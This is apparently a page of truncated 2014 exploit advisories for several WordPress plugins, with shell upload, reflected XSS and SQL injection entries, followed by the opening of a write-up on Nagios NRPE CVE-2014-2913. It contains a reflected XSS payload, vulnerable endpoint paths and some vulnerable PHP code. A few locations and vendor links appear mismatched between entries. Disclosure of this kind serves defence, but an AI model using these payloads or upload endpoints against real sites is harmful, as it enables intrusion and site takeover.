######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerability n°1:
XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerability n°2:
An unprivileged user such as a subscriber could upload a shell script....
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : www.wpdownloadmanager.com
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
# Date : 2014-07-11
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
# # # WORKS ONLY ON SERVERS WITH .HTACCESS FILES DISABLED
######################
# Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
######################
# Description :
WordPress Download Manager 2....
######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard....
######################
# Exploit Title : WordPress Compfight 1.4 Authenticated Cross Site Scripting
# Exploit Author : Claudio Viviani - HomeLab IT
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
# Date : 2014-07-03
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
if (!$search_value) {
$input_text = 'Enter Keyword(s)';
} else {
$input_text = $search_value;
}
if ($show_title) {
$output ....
General information
A few days ago a bug was found in the well-known infrastructure monitor Nagios; more precisely, the vulnerability concerns the NRPE (Nagios Remote Plugin Executor) agent.
=============================================
- Release date: 17.04.2014
- Discovered by: Dawid Golunski
- Severity: High
=============================================
CVE: 2014-2913
NRPE is an agent that is installed on every machine monitored by Nagios and, depending on how it is customized, can return various information, such as the state of the hard disk, of the memory, whether or not certain services are working, etc....